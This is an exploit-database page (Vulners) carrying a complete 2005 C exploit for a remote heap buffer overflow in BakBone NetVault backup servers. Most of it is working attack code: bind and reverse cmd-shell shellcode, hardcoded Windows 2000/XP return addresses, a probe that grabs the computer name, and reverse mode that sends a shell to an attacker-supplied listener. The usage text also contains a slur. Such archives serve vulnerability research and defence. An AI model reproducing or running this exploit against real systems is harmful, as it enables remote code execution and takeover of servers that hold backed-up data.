Vulners
Lucene search
BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow Exploit (2)
/*
for more informations class101.org/netv-remhbof.pdf
*/
#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";
char scodeA[] =
"\x11\x03\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
"\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
"\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x0C\x58\x3C\x42"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00";
char scodeB[] =
"\x00\x51\x02\x00\x00\x00\x00\x00\x00\x01\x03\x05\x27\xCA\x07\x00"
"\x00\x00\x73\x3B\x62\x3B\x6F\x3B\x00";
char scodeC[] =
"\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00"
"\x00\x69\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42"
"\x00\x01\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01"
"\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
"\x00\x10\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
"\x00\x00\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B"
"\x00\x20\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97"
"\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04"
"\x02\x4E\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC"
"\xFA\x8E\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01"
"\x02\x00\x00\x00";
char scodeD[] =
"\x00\x06\x00\x00\x00\x0B\x00\x00\x00\x05\x00\x00\x00\x54"
"\x79\x70\x65\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00"
"\x77\x69\x6E\x6E\x74\x00\x12\x00\x00\x00\x55\x44\x50\x20\x46\x72"
"\x61\x67\x6D\x65\x6E\x74\x20\x53\x69\x7A\x65\x00\x01\x00\x00\x00"
"\x01\x00\x00\x00\x05\x00\x00\x00\x31\x34\x30\x30\x00\x07\x00\x00"
"\x00\x53\x65\x72\x76\x65\x72\x00\x01\x00\x00\x00\x01\x00\x00\x00"
"\x05\x00\x00\x00\x54\x52\x55\x45\x00\x0C\x00\x00\x00\x44\x65\x73"
"\x63\x72\x69\x70\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x0A\x00\x00\x00\x4E\x56\x56\x65\x72\x73\x69\x6F\x6E\x00\x01"
"\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x37\x30\x33\x30\x00"
"\x0D\x00\x00\x00\x4E\x56\x42\x75\x69\x6C\x64\x4C\x65\x76\x65\x6C"
"\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x33\x37\x00";
char grabcpname[] =
"\xC9\x00\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
"\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
"\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x09\x00\x00\x00\x00\x00\x00\x00\x00";
char payload[1024],payload2[20000000],recvbuf[1024],ver2[1024],cpname[1024],sz[1024],szb[1024],szb2[1024];
int tot,tot2,l00p=0;
char sip[3],spo[1],pad[]="\xEB\x0A",pad2[]="\xE9\xF3\xFD\xFF\xFF";
char ret1[]="\x7E\x6D\x03\x75"; //call dword [esi+4C], ws2_32.dll, w2k SP4 EN
char ret1c[]="\xBD\x9B\x36\x7C"; //call dword [edi+74], MSVCR71.dll, XP SP1a-1-0 EN
char ret2[]="\xF0\xA1\x5C\x7C"; //UEF (UnHandledExceptionFilter) w2k sp4 EN
char ret4[]="\xB4\x73\xED\x77"; //UEF XP SP1a-1-0 EN
char padA[]="\x00\x00\x00";
char szc[]="\xFF\xFF";
// rtlmethod char repair[]="\xC7\x40\x89\x60\x20\xF8\x77"; repairing RtlEnterCriticalSection on 2k SP4
//you will prolly need to repair this repair[] for your os :>
//I did it quickly: mov dword ptr [eax-77],77F82060
//for litchfield this method is reliable due to the fixed address 0x7FFDF020
//for me that's a crap method like others known heap exploitations
//because you realiably repair the functions across all nt based os?, and where to realiably jump...,
//and also the call to drwtsn32, right before ExitProcess(), acts as a breakpoint, and your shellcode will be executed
//once 'OK' or 'CANCEL' clicked. At least this is still a 'fun' ExitProcess() :)
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
void sl(int time);
int main(int argc,char *argv[])
{
ver();
int check1, check2, rc, i, j, k;
unsigned long gip;
unsigned short gport;
char *what, *where, *os;
loop:
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=20031;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){what=ret1;where=ret2;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro English\n";}
if (atoi(argv[1]) == 2){what=ret1c;where=ret4;os="WinXP SP0 Pro. English\n[+] WinXP SP1 Pro. English\n[+] WinXP SP1a Pro. English\n";}
if (l00p==0){printf("[+] TARGET: %s\n",os);sl(1);}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
if (l00p==0)
{
printf("[+] connection 1: grabbing computername via netvault...\n");
sl(2);
send(s,grabcpname,sizeof(grabcpname)-1,0);
rc = recv(s,recvbuf,sizeof(recvbuf),0);
if (rc==-1||rc<400||recvbuf[13]!=105&&recvbuf[14]!=59){printf("[+] not netvault or patched, aborting..\n");return -1;}
else if (rc==0){printf("[+] nothing received, not netvault or patched, aborting..\n");return -1;}
else printf("[+] analyzing packets, sorting computername\n");
sl(2);
printf("[+] bufsize: %d\n",rc);sl(1);
for (i=80,j=0;recvbuf[i]!=0;i++,j++)
{
memset(cpname+j,recvbuf[i],1);
}
memset(sz,strlen(cpname)+1,1);
memset(ver2,recvbuf[rc-37],1);memset(ver2+1,0x2E,1);
memset(ver2+2,recvbuf[rc-35],1);memset(ver2+3,0x2E,1);
memset(ver2+4,recvbuf[rc-34],1);
printf("[+] cmpname: %s\n",cpname);sl(1);
printf("[+] version: %s\n",ver2);sl(1);l00p++;
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
goto loop;
}
printf("[+]\n[+] connection 2: modding payload regarding computername and length\n");sl(1);
printf("[+] loading attack\n");sl(1);
/*the cpname length is important, that's why we reajust EAX and ECX
function of cpnamelength.*/
k=7-strlen(cpname);
memset(payload,0x41,1);
// rtlmethod memset(payload2,0x90,k+32417); rtl
// rtlmethod memcpy(payload2+k+32417,"\x1C\xF0\xFD\x7F",4);
// rtlmethod memcpy(payload2+k+32421,"\x1A\x9E\xEA\x00",4);
// rtlmethod memcpy(payload2+k+31902, repair, 7);
memset(payload2,0x90,k+35431);
memcpy(payload2+k+32413,pad,2);memcpy(payload2+k+32417,what,4);memcpy(payload2+k+32421,where,4);memcpy(payload2+k+32426,pad2,5);
if (argc==6)
{
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload2+k+31914,scode2,strlen(scode2));
}
else memcpy(payload2+k+31914,scode1,strlen(scode1));
tot=sizeof(padA)-1+sizeof(scodeA)-1+sizeof(scodeB)-1+sizeof(scodeC)-1+sizeof(scodeD)-1+strlen(payload)+strlen(payload2)+strlen(sz)+strlen(cpname);
tot2=tot-192;
memcpy(szb,&tot,2);memcpy(&scodeA[0],&szb,strlen(szb));
memcpy(szb2,&tot2,2);memcpy(&scodeB[1],&szb2,strlen(szb2));
memcpy(scodeC+254,szc,2);
printf("[+] sh0uting the heap!\n");sl(3);
if (send(s,scodeA,sizeof(scodeA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,scodeB,sizeof(scodeB)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,sz,strlen(sz),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,padA,sizeof(padA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,cpname,strlen(cpname),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,scodeC,sizeof(scodeC)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
sl(6);
printf("[+]\n[+] size of payload: %d\n",tot);
if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
else printf("[+] payload sent, use telnet %s:101 to get a shell\n",inet_ntoa(server.sin_addr));
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf(" \n");
printf("[+] . 101_netvault.exe Target VulnIP (bind mode) \n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT (bind mode) \n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT GayIP GayPORT reverse mode) \n");
printf("TARGETS: \n");
printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
printf("[+] 2. WinXP SP0 Pro. English - v5.1.2600 \n");
printf("[+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
printf("[+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
printf("NOTE: \n");
printf("The exploit bind a cmdshell port 101 or \n");
printf("reverse a cmdshell on your listener. \n");
printf("A wildcard (*) mean tested working, else, supposed working. \n");
printf("A symbol (-) mean all. \n");
printf(" Compilation msvc6, cygwin, Linux. \n");
printf(" \n");
return;
}
void ver()
{
printf(" \n");
printf("============================[v0.1]====\n");
printf("=====BakBone NetVault, Backup Server===============\n");
printf("=====Clientname, Remote Heap Overflow Exploit==========\n");
printf("====coded by class101======[Hat-Squad.com 2005]=====\n");
printf("============================================\n");
printf(" \n");
}
void sl(int time)
{
#ifdef WIN32
Sleep(time*1000);
#else
Sleep(time);
#endif
}
// sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Apr 2005 00:00Current
7.1High risk
Vulners AI Score7.1